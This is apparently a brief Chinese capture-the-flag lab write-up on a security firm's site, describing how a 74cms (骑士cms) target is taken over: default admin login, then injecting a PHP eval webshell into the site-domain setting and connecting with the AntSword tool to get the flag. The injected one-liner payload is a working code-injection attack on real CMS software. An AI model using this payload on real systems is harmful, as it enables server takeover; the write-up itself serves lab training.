骑士系统cms打靶记录

Viewed 30
小小靶场直接拿下 网络靶场

骑士系统cms打靶记录
【注意】
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

🐏76
1 Answers
  1. 访问漏洞地址看到 是骑士cms系统!

image.png

  1. 在url后面加上:/index.php?m=Admin 访问后台,账号密码为:adminadmin/adminadmin

image.png

  1. 修改网站域名为一句话木马!(慎重!)

    http://127.0.0.1/.',eval($_POST[a]),'/.com

image.png

  1. 进行蚁剑链接

image.png

  1. 拿到权限,获取flag

image.png

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

🐏76

网慕安微信公众号 网慕安官方微博

(微信公众号) (网慕安微博)

Copyright © WarmSec 2024 网慕安(成都)科技有限公司 蜀ICP备2024063154号-2

热线:400-630-5665   邮箱:public@warmsec.com

公司地址:成都市高新区益州大道中段722号复城国际4栋13楼1309号